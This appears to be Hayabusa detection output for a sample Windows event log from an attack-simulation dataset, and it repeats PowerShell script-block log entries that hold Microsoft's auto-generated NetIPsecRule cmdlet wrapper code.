($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter 
= [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In';,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { 
[object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPh",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 
'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } 
